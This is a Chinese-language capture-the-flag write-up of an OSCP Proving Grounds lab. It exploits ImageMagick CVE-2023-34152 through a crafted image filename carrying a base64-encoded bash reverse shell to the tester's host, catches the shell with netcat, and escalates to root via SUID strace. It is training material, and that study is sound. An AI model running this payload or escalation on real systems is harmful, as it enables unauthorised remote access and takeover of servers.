OSCP - Proving Grounds - Image

主要知识点

• exp搜索
• SUID提权

具体步骤

首先依旧是nmap扫描，

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 22:57 UTC
Nmap scan report for 192.168.54.178
Host is up (0.00091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)

发现开了80端口，访问后上传一个图片，得到版本信息

搜索一下，得知有CVE 2023-34152 RCE漏洞

💀 Exploit for OS Command Injection in Imagemagick CVE-2023-34152 CVE-2016-5118

搜索相关exp,得到https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152 

下载并执行后，得到了一个payload,

C:\home\kali\Documents\OFFSEC\GoToWork\Image> python CVE-2023-34152.py -l 192.168.45.209 -p 80       
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\Image> ls -lrt
total 28
......
......
-rw-rw-r-- 1 kali kali   9 Oct 17 19:17 '|en"`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIwOS84MCAwPiYxCg=='$'\n'' | base64 -d | bash`".png'
                                                                                                                                                     

在本地执行nc -nlvp 80后上传该payload,得到reverse shell

C:\home\kali\Documents\OFFSEC\GoToWork\Image> nc -nlvp 80                   
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.164.178] 37486
bash: cannot set terminal process group (1169): Inappropriate ioctl for device
bash: no job control in this shell
www-data@image:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@image:/var/www/html$ cd ../
ls cd ../-l
www-data@image:/var/www$ 
ls -l
total 8
drwxr-xr-x 2 www-data www-data 4096 Aug 24  2023 html
-rw-r--r-- 1 www-data www-data   33 Oct 17 23:00 local.txt
www-data@image:/var/www$ cat local.txt
cat local.txt
fffab05d753809994c4a8765f0425163

查找一下SUID相关信息，得到strace这个命令有点可疑

www-data@image:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/strace
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh

在GTFObins上搜索到提权方式，

成功提权

www-data@image:/tmp$ /usr/bin/strace -o /dev/null /bin/bash -p
/usr/bin/strace -o /dev/null /bin/bash -p
bash-5.0# id        
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
e7618c2af2adf61999717296bba72249